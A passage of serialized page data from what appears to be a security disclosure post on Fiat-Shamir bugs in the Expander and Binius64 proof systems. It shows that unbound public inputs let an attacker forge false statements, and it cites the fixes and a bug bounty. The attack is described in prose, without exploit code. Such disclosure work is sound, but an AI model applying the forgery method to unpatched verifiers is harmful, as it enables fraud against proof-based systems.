0},[169,170],[123732],{"type":32,"value":3293},{"type":26,"tag":137,"props":123734,"children":123736},{"className":123735,"style":281},[184],[],{"type":26,"tag":137,"props":123738,"children":123740},{"className":123739},[286],[123741],{"type":32,"value":289},{"type":26,"tag":137,"props":123743,"children":123745},{"className":123744,"style":281},[184],[],{"type":26,"tag":137,"props":123747,"children":123749},{"className":123748},[151],[123750,123754],{"type":26,"tag":137,"props":123751,"children":123753},{"className":123752,"style":368},[156],[],{"type":26,"tag":137,"props":123755,"children":123757},{"className":123756},[169],[123758],{"type":32,"value":1817},{"type":26,"tag":35,"props":123760,"children":123761},{},[123762],{"type":32,"value":123763},"Substitution reduces this to a quadratic in one variable, which is solvable with the quadratic formula.",{"type":26,"tag":35,"props":123765,"children":123766},{},[123767,123771,123773,123780,123782,123789],{"type":26,"tag":84,"props":123768,"children":123769},{},[123770],{"type":32,"value":119321},{"type":32,"value":123772}," Fixed on March 5, 2026 via ",{"type":26,"tag":41,"props":123774,"children":123777},{"href":123775,"rel":123776},"https://github.com/scroll-tech/ceno/pull/1262",[45],[123778],{"type":32,"value":123779},"PR #1262",{"type":32,"value":123781}," (original report: ",{"type":26,"tag":41,"props":123783,"children":123786},{"href":123784,"rel":123785},"https://github.com/scroll-tech/ceno/issues/1125",[45],[123787],{"type":32,"value":123788},"#1125",{"type":32,"value":200},{"type":26,"tag":3265,"props":123791,"children":123792},{},[],{"type":26,"tag":118,"props":123794,"children":123796},{"id":123795},"expander-polyhedra",[123797],{"type":32,"value":123798},"Expander (Polyhedra)",{"type":26,"tag":35,"props":123800,"children":123801},{},[123802],{"type":32,"value":123803},"Expander is a GKR-based proof system for arithmetic circuits.",{"type":26,"tag":35,"props":123805,"children":123806},{},[123807],{"type":26,"tag":84,"props":123808,"children":123809},{},[123810],{"type":32,"value":118028},{"type":26,"tag":5512,"props":123812,"children":123814},{"code":123813},"Proof (raw bytes, parsed in order):\n    - PCS commitment\n    - Sumcheck round polynomials (for each layer)\n    - Layer claims (claim_x, claim_y)\n    - PCS opening proofs\n\nNOT in proof bytes (passed separately):\n    - public_input    // statement data passed separately\n    - claimed_v       // statement claim passed separately\n",[123815],{"type":26,"tag":130,"props":123816,"children":123817},{"__ignoreMap":7},[123818],{"type":32,"value":123813},{"type":26,"tag":35,"props":123820,"children":123821},{},[123822,123824,123830],{"type":32,"value":123823},"In Expander's circuit model, constant gates can reference public input values. During GKR verification, the ",{"type":26,"tag":130,"props":123825,"children":123827},{"className":123826},[],[123828],{"type":32,"value":123829},"eval_cst",{"type":32,"value":123831}," evaluates the contribution of these gates at the sumcheck challenge point:",{"type":26,"tag":5512,"props":123833,"children":123835},{"code":123834,"language":5551,"meta":7,"className":5552,"style":7},"sum -= GKRVerifierHelper::eval_cst(&layer.const_, public_input, sp);\n",[123836],{"type":26,"tag":130,"props":123837,"children":123838},{"__ignoreMap":7},[123839],{"type":26,"tag":137,"props":123840,"children":123841},{"class":5559,"line":5560},[123842,123846,123851,123856,123860,123864,123868,123872,123877,123881,123886,123891,123895,123900],{"type":26,"tag":137,"props":123843,"children":123844},{"style":5584},[123845],{"type":32,"value":79235},{"type":26,"tag":137,"props":123847,"children":123848},{"style":5590},[123849],{"type":32,"value":123850}," -=",{"type":26,"tag":137,"props":123852,"children":123853},{"style":6009},[123854],{"type":32,"value":123855}," GKRVerifierHelper",{"type":26,"tag":137,"props":123857,"children":123858},{"style":5590},[123859],{"type":32,"value":6072},{"type":26,"tag":137,"props":123861,"children":123862},{"style":5682},[123863],{"type":32,"value":123829},{"type":26,"tag":137,"props":123865,"children":123866},{"style":5601},[123867],{"type":32,"value":165},{"type":26,"tag":137,"props":123869,"children":123870},{"style":5590},[123871],{"type":32,"value":5694},{"type":26,"tag":137,"props":123873,"children":123874},{"style":5584},[123875],{"type":32,"value":123876},"layer",{"type":26,"tag":137,"props":123878,"children":123879},{"style":5590},[123880],{"type":32,"value":470},{"type":26,"tag":137,"props":123882,"children":123883},{"style":5601},[123884],{"type":32,"value":123885},"const_, ",{"type":26,"tag":137,"props":123887,"children":123888},{"style":5584},[123889],{"type":32,"value":123890},"public_input",{"type":26,"tag":137,"props":123892,"children":123893},{"style":5601},[123894],{"type":32,"value":1108},{"type":26,"tag":137,"props":123896,"children":123897},{"style":5584},[123898],{"type":32,"value":123899},"sp",{"type":26,"tag":137,"props":123901,"children":123902},{"style":5601},[123903],{"type":32,"value":6430},{"type":26,"tag":35,"props":123905,"children":123906},{},[123907,123909,123914],{"type":32,"value":123908},"This evaluation is a linear combination of public input values, weighted by coefficients derived from the challenges stored in the verifier's scratch pad (",{"type":26,"tag":130,"props":123910,"children":123912},{"className":123911},[],[123913],{"type":32,"value":123899},{"type":32,"value":4437},{"type":26,"tag":35,"props":123916,"children":123917},{},[123918],{"type":26,"tag":84,"props":123919,"children":123920},{},[123921],{"type":32,"value":123922},"The vulnerability:",{"type":26,"tag":35,"props":123924,"children":123925},{},[123926,123931],{"type":26,"tag":130,"props":123927,"children":123929},{"className":123928},[],[123930],{"type":32,"value":123890},{"type":32,"value":123932}," is never absorbed into the transcript. The transcript is initialized from the PCS commitment and sumcheck round messages, but public inputs are passed separately to the verifier.",{"type":26,"tag":35,"props":123934,"children":123935},{},[123936],{"type":26,"tag":2210,"props":123937,"children":123940},{"alt":123938,"src":123939},"9_expander","/posts/zkvms-unfaithful-claims/9_expander.svg",[],{"type":26,"tag":35,"props":123942,"children":123943},{},[123944,123945,123950],{"type":32,"value":19206},{"type":26,"tag":130,"props":123946,"children":123948},{"className":123947},[],[123949],{"type":32,"value":123829},{"type":32,"value":123951}," function computes a linear combination:",{"type":26,"tag":35,"props":123953,"children":123954},{},[123955],{"type":26,"tag":130,"props":123956,"children":123958},{"className":123957},[133,134],[123959],{"type":26,"tag":137,"props":123960,"children":123962},{"className":123961},[140],[123963],{"type":26,"tag":137,"props":123964,"children":123966},{"className":123965,"ariaHidden":146},[145],[123967,124012,124136],{"type":26,"tag":137,"props":123968,"children":123970},{"className":123969},[151],[123971,123975,123984,123989,123999,124003,124008],{"type":26,"tag":137,"props":123972,"children":123974},{"className":123973,"style":97046},[156],[],{"type":26,"tag":137,"props":123976,"children":123978},{"className":123977},[169,32],[123979],{"type":26,"tag":137,"props":123980,"children":123982},{"className":123981},[169],[123983],{"type":32,"value":40144},{"type":26,"tag":137,"props":123985,"children":123987},{"className":123986,"style":621},[169],[123988],{"type":32,"value":5666},{"type":26,"tag":137,"props":123990,"children":123992},{"className":123991},[169,32],[123993],{"type":26,"tag":137,"props":123994,"children":123996},{"className":123995},[169],[123997],{"type":32,"value":123998},"cst",{"type":26,"tag":137,"props":124000,"children":124002},{"className":124001,"style":281},[184],[],{"type":26,"tag":137,"props":124004,"children":124006},{"className":124005},[286],[124007],{"type":32,"value":289},{"type":26,"tag":137,"props":124009,"children":124011},{"className":124010,"style":281},[184],[],{"type":26,"tag":137,"props":124013,"children":124015},{"className":124014},[151],[124016,124020,124077,124081,124108,124113,124118,124123,124127,124132],{"type":26,"tag":137,"props":124017,"children":124019},{"className":124018,"style":95590},[156],[],{"type":26,"tag":137,"props":124021,"children":124023},{"className":124022},[3722],[124024,124029],{"type":26,"tag":137,"props":124025,"children":124027},{"className":124026,"style":3725},[3722,3723,3724],[124028],{"type":32,"value":3728},{"type":26,"tag":137,"props":124030,"children":124032},{"className":124031},[236],[124033],{"type":26,"tag":137,"props":124034,"children":124036},{"className":124035},[241,417],[124037,124066],{"type":26,"tag":137,"props":124038,"children":124040},{"className":124039},[246],[124041,124061],{"type":26,"tag":137,"props":124042,"children":124044},{"className":124043,"style":116822},[251],[124045],{"type":26,"tag":137,"props":124046,"children":124047},{"style":24239},[124048,124052],{"type":26,"tag":137,"props":124049,"children":124051},{"className":124050,"style":262},[261],[],{"type":26,"tag":137,"props":124053,"children":124055},{"className":124054},[267,268,269,270],[124056],{"type":26,"tag":137,"props":124057,"children":124059},{"className":124058},[169,170,270],[124060],{"type":32,"value":506},{"type":26,"tag":137,"props":124062,"children":124064},{"className":124063},[453],[124065],{"type":32,"value":456},{"type":26,"tag":137,"props":124067,"children":124069},{"className":124068},[246],[124070],{"type":26,"tag":137,"props":124071,"children":124073},{"className":124072,"style":117102},[251],[124074],{"type":26,"tag":137,"props":124075,"children":124076},{},[],{"type":26,"tag":137,"props":124078,"children":124080},{"className":124079,"style":185},[184],[],{"type":26,"tag":137,"props":124082,"children":124084},{"className":124083},[169],[124085,124094,124099],{"type":26,"tag":137,"props":124086,"children":124088},{"className":124087},[169,32],[124089],{"type":26,"tag":137,"props":124090,"children":124092},{"className":124091},[169],[124093],{"type":32,"value":64276},{"type":26,"tag":137,"props":124095,"children":124097},{"className":124096,"style":621},[169],[124098],{"type":32,"value":5666},{"type":26,"tag":137,"props":124100,"children":124102},{"className":124101},[169,32],[124103],{"type":26,"tag":137,"props":124104,"children":124106},{"className":124105},[169],[124107],{"type":32,"value":10952},{"type":26,"tag":137,"props":124109,"children":124111},{"className":124110},[162],[124112],{"type":32,"value":3016},{"type":26,"tag":137,"props":124114,"children":124116},{"className":124115},[169,170],[124117],{"type":32,"value":506},{"type":26,"tag":137,"props":124119,"children":124121},{"className":124120},[197],[124122],{"type":32,"value":3079},{"type":26,"tag":137,"props":124124,"children":124126},{"className":124125,"style":348},[184],[],{"type":26,"tag":137,"props":124128,"children":124130},{"className":124129},[353],[124131],{"type":32,"value":2172},{"type":26,"tag":137,"props":124133,"children":124135},{"className":124134,"style":348},[184],[],{"type":26,"tag":137,"props":124137,"children":124139},{"className":124138},[151],[124140,124144,124153,124158,124163,124168,124172,124221],{"type":26,"tag":137,"props":124141,"children":124143},{"className":124142,"style":157},[156],[],{"type":26,"tag":137,"props":124145,"children":124147},{"className":124146},[169,32],[124148],{"type":26,"tag":137,"props":124149,"children":124151},{"className":124150},[169],[124152],{"type":32,"value":115207},{"type":26,"tag":137,"props":124154,"children":124156},{"className":124155},[162],[124157],{"type":32,"value":165},{"type":26,"tag":137,"props":124159,"children":124161},{"className":124160},[169,170],[124162],{"type":32,"value":506},{"type":26,"tag":137,"props":124164,"children":124166},{"className":124165},[177],[124167],{"type":32,"value":180},{"type":26,"tag":137,"props":124169,"children":124171},{"className":124170,"style":185},[184],[],{"type":26,"tag":137,"props":124173,"children":124175},{"className":124174},[169,114767],[124176],{"type":26,"tag":137,"props":124177,"children":124179},{"className":124178},[241],[124180],{"type":26,"tag":137,"props":124181,"children":124183},{"className":124182},[246],[124184],{"type":26,"tag":137,"props":124185,"children":124187},{"className":124186,"style":114853},[251],[124188,124200],{"type":26,"tag":137,"props":124189,"children":124190},{"style":114784},[124191,124195],{"type":26,"tag":137,"props":124192,"children":124194},{"className":124193,"style":114789},[261],[],{"type":26,"tag":137,"props":124196,"children":124198},{"className":124197,"style":621},[169,170],[124199],{"type":32,"value":624},{"type":26,"tag":137,"props":124201,"children":124202},{"style":114784},[124203,124207],{"type":26,"tag":137,"props":124204,"children":124206},{"className":124205,"style":114789},[261],[],{"type":26,"tag":137,"props":124208,"children":124210},{"className":124209,"style":114877},[114807],[124211],{"type":26,"tag":137,"props":124212,"children":124214},{"className":124213,"style":114883},[114882],[124215],{"type":26,"tag":36869,"props":124216,"children":124217},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[124218],{"type":26,"tag":114895,"props":124219,"children":124220},{"d":114897},[],{"type":26,"tag":137,"props":124222,"children":124224},{"className":124223},[197],[124225],{"type":32,"value":200},{"type":26,"tag":35,"props":124227,"children":124228},{},[124229,124230,124299,124301,124306,124308,124313],{"type":32,"value":118448},{"type":26,"tag":130,"props":124231,"children":124233},{"className":124232},[133,134],[124234],{"type":26,"tag":137,"props":124235,"children":124237},{"className":124236},[140],[124238],{"type":26,"tag":137,"props":124239,"children":124241},{"className":124240,"ariaHidden":146},[145],[124242],{"type":26,"tag":137,"props":124243,"children":124245},{"className":124244},[151],[124246,124250],{"type":26,"tag":137,"props":124247,"children":124249},{"className":124248,"style":114853},[156],[],{"type":26,"tag":137,"props":124251,"children":124253},{"className":124252},[169,114767],[124254],{"type":26,"tag":137,"props":124255,"children":124257},{"className":124256},[241],[124258],{"type":26,"tag":137,"props":124259,"children":124261},{"className":124260},[246],[124262],{"type":26,"tag":137,"props":124263,"children":124265},{"className":124264,"style":114853},[251],[124266,124278],{"type":26,"tag":137,"props":124267,"children":124268},{"style":114784},[124269,124273],{"type":26,"tag":137,"props":124270,"children":124272},{"className":124271,"style":114789},[261],[],{"type":26,"tag":137,"props":124274,"children":124276},{"className":124275,"style":621},[169,170],[124277],{"type":32,"value":624},{"type":26,"tag":137,"props":124279,"children":124280},{"style":114784},[124281,124285],{"type":26,"tag":137,"props":124282,"children":124284},{"className":124283,"style":114789},[261],[],{"type":26,"tag":137,"props":124286,"children":124288},{"className":124287,"style":114877},[114807],[124289],{"type":26,"tag":137,"props":124290,"children":124292},{"className":124291,"style":114883},[114882],[124293],{"type":26,"tag":36869,"props":124294,"children":124295},{"xmlns":114887,"width":114888,"height":114889,"style":114890,"viewBox":114891,"preserveAspectRatio":114892},[124296],{"type":26,"tag":114895,"props":124297,"children":124298},{"d":114897},[],{"type":32,"value":124300}," contains the challenges. Since challenges are derived before the statement data is bound, they are independent of ",{"type":26,"tag":130,"props":124302,"children":124304},{"className":124303},[],[124305],{"type":32,"value":123890},{"type":32,"value":124307},". This lets an attacker choose an arbitrary false statement (e.g., a forged output) and then solve the induced linear constraints for a modified ",{"type":26,"tag":130,"props":124309,"children":124311},{"className":124310},[],[124312],{"type":32,"value":123890},{"type":32,"value":124314}," that makes the verifier's check pass.",{"type":26,"tag":35,"props":124316,"children":124317},{},[124318,124322,124324,124331,124332,124335,124342],{"type":26,"tag":84,"props":124319,"children":124320},{},[124321],{"type":32,"value":119321},{"type":32,"value":124323}," Fixed on 21st January 2026 via ",{"type":26,"tag":41,"props":124325,"children":124328},{"href":124326,"rel":124327},"https://github.com/PolyhedraZK/Expander/commit/4a8c2be03535194c1f6b48a93ad2f5480649f7c2",[45],[124329],{"type":32,"value":124330},"commit 4a8c2be",{"type":32,"value":1011},{"type":26,"tag":33563,"props":124333,"children":124334},{},[],{"type":26,"tag":41,"props":124336,"children":124339},{"href":124337,"rel":124338},"https://blog.polyhedra.network/expander-bug-bounty/",[45],[124340],{"type":32,"value":124341},"Claimed 500k Bug bounty",{"type":32,"value":124343}," award pending",{"type":26,"tag":3265,"props":124345,"children":124346},{},[],{"type":26,"tag":118,"props":124348,"children":124350},{"id":124349},"binius64",[124351],{"type":32,"value":110468},{"type":26,"tag":35,"props":124353,"children":124354},{},[124355,124357,124482],{"type":32,"value":124356},"Binius64 is a proof system optimized for binary fields, designed to be efficient on 64-bit CPUs. Binius uses ",{"type":26,"tag":130,"props":124358,"children":124360},{"className":124359},[133,134],[124361],{"type":26,"tag":137,"props":124362,"children":124364},{"className":124363},[140],[124365],{"type":26,"tag":137,"props":124366,"children":124368},{"className":124367,"ariaHidden":146},[145],[124369],{"type":26,"tag":137,"props":124370,"children":124372},{"className":124371},[151],[124373,124378],{"type":26,"tag":137,"props":124374,"children":124377},{"className":124375,"style":124376},[156],"height:0.8665em;vertical-align:-0.1776em;",[],{"type":26,"tag":137,"props":124379,"children":124381},{"className":124380},[169],[124382,124387],{"type":26,"tag":137,"props":124383,"children":124385},{"className":124384},[169,406],[124386],{"type":32,"value":409},{"type":26,"tag":137,"props":124388,"children":124390},{"className":124389},[236],[124391],{"type":26,"tag":137,"props":124392,"children":124394},{"className":124393},[241,417],[124395,124470],{"type":26,"tag":137,"props":124396,"children":124398},{"className":124397},[246],[124399,124465],{"type":26,"tag":137,"props":124400,"children":124402},{"className":124401,"style":114950},[251],[124403],{"type":26,"tag":137,"props":124404,"children":124406},{"style":124405},"top:-2.5224em;margin-left:0em;margin-right:0.05em;",[124407,124411],{"type":26,"tag":137,"props":124408,"children":124410},{"className":124409,"style":262},[261],[],{"type":26,"tag":137,"props":124412,"children":124414},{"className":124413},[267,268,269,270],[124415],{"type":26,"tag":137,"props":124416,"children":124418},{"className":124417},[169,270],[124419],{"type":26,"tag":137,"props":124420,"children":124422},{"className":124421},[169,270],[124423,124428],{"type":26,"tag":137,"props":124424,"children":124426},{"className":124425},[169,270],[124427],{"type":32,"value":277},{"type":26,"tag":137,"props":124429,"children":124431},{"className":124430},[236],[124432],{"type":26,"tag":137,"props":124433,"children":124435},{"className":124434},[241],[124436],{"type":26,"tag":137,"props":124437,"children":124439},{"className":124438},[246],[124440],{"type":26,"tag":137,"props":124441,"children":124444},{"className":124442,"style":124443},[251],"height:0.7463em;",[124445],{"type":26,"tag":137,"props":124446,"children":124447},{"style":115075},[124448,124452],{"type":26,"tag":137,"props":124449,"children":124451},{"className":124450,"style":111483},[261],[],{"type":26,"tag":137,"props":124453,"children":124455},{"className":124454},[267,111488,111489,270],[124456],{"type":26,"tag":137,"props":124457,"children":124459},{"className":124458},[169,270],[124460],{"type":26,"tag":137,"props":124461,"children":124463},{"className":124462},[169,270],[124464],{"type":32,"value":32441},{"type":26,"tag":137,"props":124466,"children":124468},{"className":124467},[453],[124469],{"type":32,"value":456},{"type":26,"tag":137,"props":124471,"children":124473},{"className":124472},[246],[124474],{"type":26,"tag":137,"props":124475,"children":124478},{"className":124476,"style":124477},[251],"height:0.1776em;",[124479],{"type":26,"tag":137,"props":124480,"children":124481},{},[],{"type":32,"value":124483}," (or variants thereof), where addition is XOR. This makes certain operations very fast.",{"type":26,"tag":35,"props":124485,"children":124486},{},[124487,124489,124494],{"type":32,"value":124488},"One of Binius's key features is its specialized protocols for bitwise operations. The ",{"type":26,"tag":84,"props":124490,"children":124491},{},[124492],{"type":32,"value":124493},"Shift Protocol",{"type":32,"value":124495}," efficiently handles bit-shifts and rotations (essential for hash functions like SHA-256) without the massive overhead typical in other proof systems.",{"type":26,"tag":35,"props":124497,"children":124498},{},[124499],{"type":26,"tag":84,"props":124500,"children":124501},{},[124502],{"type":32,"value":123922},{"type":26,"tag":35,"props":124504,"children":124505},{},[124506],{"type":32,"value":124507},"The verifier receives the public witness (program inputs/outputs) as a separate parameter:",{"type":26,"tag":5512,"props":124509,"children":124511},{"code":124510,"language":5551,"meta":7,"className":5552,"style":7},"pub fn verify\u003CF, C>(\n    constraint_system: &ConstraintSystem,\n    public: &[Word],    // \u003C- NEVER ABSORBED\n    // ...\n) -> Result\u003CVerifyOutput\u003CF>, Error>\n",[124512],{"type":26,"tag":130,"props":124513,"children":124514},{"__ignoreMap":7},[124515,124550,124575,124609,124617],{"type":26,"tag":137,"props":124516,"children":124517},{"class":5559,"line":5560},[124518,124522,124526,124530,124534,124538,124542,124546],{"type":26,"tag":137,"props":124519,"children":124520},{"style":5573},[124521],{"type":32,"value":16281},{"type":26,"tag":137,"props":124523,"children":124524},{"style":5573},[124525],{"type":32,"value":16286},{"type":26,"tag":137,"props":124527,"children":124528},{"style":5682},[124529],{"type":32,"value":10751},{"type":26,"tag":137,"props":124531,"children":124532},{"style":5601},[124533],{"type":32,"value":8391},{"type":26,"tag":137,"props":124535,"children":124536},{"style":6009},[124537],{"type":32,"value":409},{"type":26,"tag":137,"props":124539,"children":124540},{"style":5601},[124541],{"type":32,"value":1108},{"type":26,"tag":137,"props":124543,"children":124544},{"style":6009},[124545],{"type":32,"value":118841},{"type":26,"tag":137,"props":124547,"children":124548},{"style":5601},[124549],{"type":32,"value":9172},{"type":26,"tag":137,"props":124551,"children":124552},{"class":5559,"line":5412},[124553,124558,124562,124566,124571],{"type":26,"tag":137,"props":124554,"children":124555},{"style":5584},[124556],{"type":32,"value":124557},"    constraint_system",{"type":26,"tag":137,"props":124559,"children":124560},{"style":5590},[124561],{"type":32,"value":7072},{"type":26,"tag":137,"props":124563,"children":124564},{"style":5590},[124565],{"type":32,"value":9725},{"type":26,"tag":137,"props":124567,"children":124568},{"style":6009},[124569],{"type":32,"value":124570},"ConstraintSystem",{"type":26,"tag":137,"props":124572,"children":124573},{"style":5601},[124574],{"type":32,"value":6099},{"type":26,"tag":137,"props":124576,"children":124577},{"class":5559,"line":5417},[124578,124582,124586,124590,124594,124599,124604],{"type":26,"tag":137,"props":124579,"children":124580},{"style":5584},[124581],{"type":32,"value":10106},{"type":26,"tag":137,"props":124583,"children":124584},{"style":5590},[124585],{"type":32,"value":7072},{"type":26,"tag":137,"props":124587,"children":124588},{"style":5590},[124589],{"type":32,"value":9725},{"type":26,"tag":137,"props":124591,"children":124592},{"style":5601},[124593],{"type":32,"value":3016},{"type":26,"tag":137,"props":124595,"children":124596},{"style":6009},[124597],{"type":32,"value":124598},"Word",{"type":26,"tag":137,"props":124600,"children":124601},{"style":5601},[124602],{"type":32,"value":124603},"],    ",{"type":26,"tag":137,"props":124605,"children":124606},{"style":5564},[124607],{"type":32,"value":124608},"// \u003C- NEVER ABSORBED\n",{"type":26,"tag":137,"props":124610,"children":124611},{"class":5559,"line":5642},[124612],{"type":26,"tag":137,"props":124613,"children":124614},{"style":5564},[124615],{"type":32,"value":124616},"    // ...\n",{"type":26,"tag":137,"props":124618,"children":124619},{"class":5559,"line":5745},[124620,124624,124628,124632,124636,124641,124645,124649,124653,124657],{"type":26,"tag":137,"props":124621,"children":124622},{"style":5601},[124623],{"type":32,"value":5671},{"type":26,"tag":137,"props":124625,"children":124626},{"style":5590},[124627],{"type":32,"value":16348},{"type":26,"tag":137,"props":124629,"children":124630},{"style":6009},[124631],{"type":32,"value":16353},{"type":26,"tag":137,"props":124633,"children":124634},{"style":5601},[124635],{"type":32,"value":8391},{"type":26,"tag":137,"props":124637,"children":124638},{"style":6009},[124639],{"type":32,"value":124640},"VerifyOutput",{"type":26,"tag":137,"props":124642,"children":124643},{"style":5601},[124644],{"type":32,"value":8391},{"type":26,"tag":137,"props":124646,"children":124647},{"style":6009},[124648],{"type":32,"value":409},{"type":26,"tag":137,"props":124650,"children":124651},{"style":5601},[124652],{"type":32,"value":9214},{"type":26,"tag":137,"props":124654,"children":124655},{"style":6009},[124656],{"type":32,"value":39994},{"type":26,"tag":137,"props":124658,"children":124659},{"style":5601},[124660],{"type":32,"value":8577},{"type":26,"tag":35,"props":124662,"children":124663},{},[124664,124666,124672,124673,124679,124681,124685],{"type":32,"value":124665},"In the shift protocol, challenges ",{"type":26,"tag":130,"props":124667,"children":124669},{"className":124668},[],[124670],{"type":32,"value":124671},"r_j",{"type":32,"value":3339},{"type":26,"tag":130,"props":124674,"children":124676},{"className":124675},[],[124677],{"type":32,"value":124678},"inout_eval_point",{"type":32,"value":124680}," are sampled ",{"type":26,"tag":84,"props":124682,"children":124683},{},[124684],{"type":32,"value":2526},{"type":32,"value":124686}," the public witness is bound.",{"type":26,"tag":35,"props":124688,"children":124689},{},[124690],{"type":26,"tag":84,"props":124691,"children":124692},{},[124693],{"type":32,"value":118044},{"type":26,"tag":35,"props":124695,"children":124696},{},[124697],{"type":26,"tag":2210,"props":124698,"children":124701},{"alt":124699,"src":124700},"10_binius","/posts/zkvms-unfaithful-claims/10_binius.svg",[],{"type":26,"tag":35,"props":124703,"children":124704},{},[124705],{"type":32,"value":124706},"During verification",{"type":26,"tag":4820,"props":124708,"children":124709},{},[124710,124730,124742,124761],{"type":26,"tag":3430,"props":124711,"children":124712},{},[124713,124715,124720,124722,124728],{"type":32,"value":124714},"Sumcheck produces challenge points ",{"type":26,"tag":130,"props":124716,"children":124718},{"className":124717},[],[124719],{"type":32,"value":124671},{"type":32,"value":124721}," (bit indices) and ",{"type":26,"tag":130,"props":124723,"children":124725},{"className":124724},[],[124726],{"type":32,"value":124727},"r_s",{"type":32,"value":124729}," (shift indices)",{"type":26,"tag":3430,"props":124731,"children":124732},{},[124733,124735,124740],{"type":32,"value":124734},"Verifier samples ",{"type":26,"tag":130,"props":124736,"children":124738},{"className":124737},[],[124739],{"type":32,"value":124678},{"type":32,"value":124741}," from transcript",{"type":26,"tag":3430,"props":124743,"children":124744},{},[124745,124747,124753,124755,124760],{"type":32,"value":124746},"Verifier computes ",{"type":26,"tag":130,"props":124748,"children":124750},{"className":124749},[],[124751],{"type":32,"value":124752},"public_eval = MLE(public, r_j, inout_eval_point)",{"type":32,"value":124754}," using the unbound ",{"type":26,"tag":130,"props":124756,"children":124758},{"className":124757},[],[124759],{"type":32,"value":64276},{"type":32,"value":20726},{"type":26,"tag":3430,"props":124762,"children":124763},{},[124764,124765,124771],{"type":32,"value":19206},{"type":26,"tag":130,"props":124766,"children":124768},{"className":124767},[],[124769],{"type":32,"value":124770},"public_eval",{"type":32,"value":124772}," feeds into subsequent verification equations",{"type":26,"tag":35,"props":124774,"children":124775},{},[124776],{"type":32,"value":124777},"The MLE evaluation is linear in the public witness bits:",{"type":26,"tag":35,"props":124779,"children":124780},{},[124781],{"type":26,"tag":130,"props":124782,"children":124784},{"className":124783},[133,134],[124785],{"type":26,"tag":137,"props":124786,"children":124788},{"className":124787},[140],[124789],{"type":26,"tag":137,"props":124790,"children":124792},{"className":124791,"ariaHidden":146},[145],[124793,124837,124977,125089],{"type":26,"tag":137,"props":124794,"children":124796},{"className":124795},[151],[124797,124801,124810,124815,124824,124828,124833],{"type":26,"tag":137,"props":124798,"children":124800},{"className":124799,"style":97046},[156],[],{"type":26,"tag":137,"props":124802,"children":124804},{"className":124803},[169,32],[124805],{"type":26,"tag":137,"props":124806,"children":124808},{"className":124807},[169],[124809],{"type":32,"value":64276},{"type":26,"tag":137,"props":124811,"children":124813},{"className":124812,"style":621},[169],[124814],{"type":32,"value":5666},{"type":26,"tag":137,"props":124816,"children":124818},{"className":124817},[169,32],[124819],{"type":26,"tag":137,"props":124820,"children":124822},{"className":124821},[169],[124823],{"type":32,"value":40144},{"type":26,"tag":137,"props":124825,"children":124827},{"className":124826,"style":281},[184],[],{"type":26,"tag":137,"props":124829,"children":124831},{"className":124830},[286],[124832],{"type":32,"value":289},{"type":26,"tag":137,"props":124834,"children":124836},{"className":124835,"style":281},[184],[],{"type":26,"tag":137,"props":124838,"children":124840},{"className":124839},[151],[124841,124845,124917,124921,124934,124939,124944,124949,124954,124959,124964,124968,124973],{"type":26,"tag":137,"props":124842,"children":124844},{"className":124843,"style":121372},[156],[],{"type":26,"tag":137,"props":124846,"children":124848},{"className":124847},[3722],[124849,124854],{"type":26,"tag":137,"props":124850,"children":124852},{"className":124851,"style":3725},[3722,3723,3724],[124853],{"type":32,"value":3728},{"type":26,"tag":137,"props":124855,"children":124857},{"className":124856},[236],[124858],{"type":26,"tag":137,"props":124859,"children":124861},{"className":124860},[241,417],[124862,124906],{"type":26,"tag":137,"props":124863,"children":124865},{"className":124864},[246],[124866,124901],{"type":26,"tag":137,"props":124867,"children":124869},{"className":124868,"style":116288},[251],[124870],{"type":26,"tag":137,"props":124871,"children":124872},{"style":24239},[124873,124877],{"type":26,"tag":137,"props":124874,"children":124876},{"className":124875,"style":262},[261],[],{"type":26,"tag":137,"props":124878,"children":124880},{"className":124879},[267,268,269,270],[124881],{"type":26,"tag":137,"props":124882,"children":124884},{"className":124883},[169,270],[124885,124891,124896],{"type":26,"tag":137,"props":124886,"children":124889},{"className":124887,"style":124888},[169,170,270],"margin-right:0.02691em;",[124890],{"type":32,"value":52174},{"type":26,"tag":137,"props":124892,"children":124894},{"className":124893},[177,270],[124895],{"type":32,"value":180},{"type":26,"tag":137,"props":124897,"children":124899},{"className":124898},[169,170,270],[124900],{"type":32,"value":2832},{"type":26,"tag":137,"props":124902,"children":124904},{"className":124903},[453],[124905],{"type":32,"value":456},{"type":26,"tag":137,"props":124907,"children":124909},{"className":124908},[246],[124910],{"type":26,"tag":137,"props":124911,"children":124913},{"className":124912,"style":116853},[251],[124914],{"type":26,"tag":137,"props":124915,"children":124916},{},[],{"type":26,"tag":137,"props":124918,"children":124920},{"className":124919,"style":185},[184],[],{"type":26,"tag":137,"props":124922,"children":124924},{"className":124923},[169],[124925],{"type":26,"tag":137,"props":124926,"children":124928},{"className":124927},[169,32],[124929],{"type":26,"tag":137,"props":124930,"children":124932},{"className":124931},[169],[124933],{"type":32,"value":64276},{"type":26,"tag":137,"props":124935,"children":124937},{"className":124936},[162],[124938],{"type":32,"value":3016},{"type":26,"tag":137,"props":124940,"children":124942},{"className":124941,"style":124888},[169,170],[124943],{"type":32,"value":52174},{"type":26,"tag":137,"props":124945,"children":124947},{"className":124946},[197],[124948],{"type":32,"value":3079},{"type":26,"tag":137,"props":124950,"children":124952},{"className":124951},[162],[124953],{"type":32,"value":3016},{"type":26,"tag":137,"props":124955,"children":124957},{"className":124956},[169,170],[124958],{"type":32,"value":2832},{"type":26,"tag":137,"props":124960,"children":124962},{"className":124961},[197],[124963],{"type":32,"value":3079},{"type":26,"tag":137,"props":124965,"children":124967},{"className":124966,"style":348},[184],[],{"type":26,"tag":137,"props":124969,"children":124971},{"className":124970},[353],[124972],{"type":32,"value":2172},{"type":26,"tag":137,"props":124974,"children":124976},{"className":124975,"style":348},[184],[],{"type":26,"tag":137,"props":124978,"children":124980},{"className":124979},[151],[124981,124986,124995,125000,125005,125010,125014,125071,125076,125080,125085],{"type":26,"tag":137,"props":124982,"children":124985},{"className":124983,"style":124984},[156],"height:1.0361em;vertical-align:-0.2861em;",[],{"type":26,"tag":137,"props":124987,"children":124989},{"className":124988},[169,32],[124990],{"type":26,"tag":137,"props":124991,"children":124993},{"className":124992},[169],[124994],{"type":32,"value":115207},{"type":26,"tag":137,"props":124996,"children":124998},{"className":124997},[162],[124999],{"type":32,"value":165},{"type":26,"tag":137,"props":125001,"children":125003},{"className":125002},[169,170],[125004],{"type":32,"value":2832},{"type":26,"tag":137,"props":125006,"children":125008},{"className":125007},[177],[125009],{"type":32,"value":180},{"type":26,"tag":137,"props":125011,"children":125013},{"className":125012,"style":185},[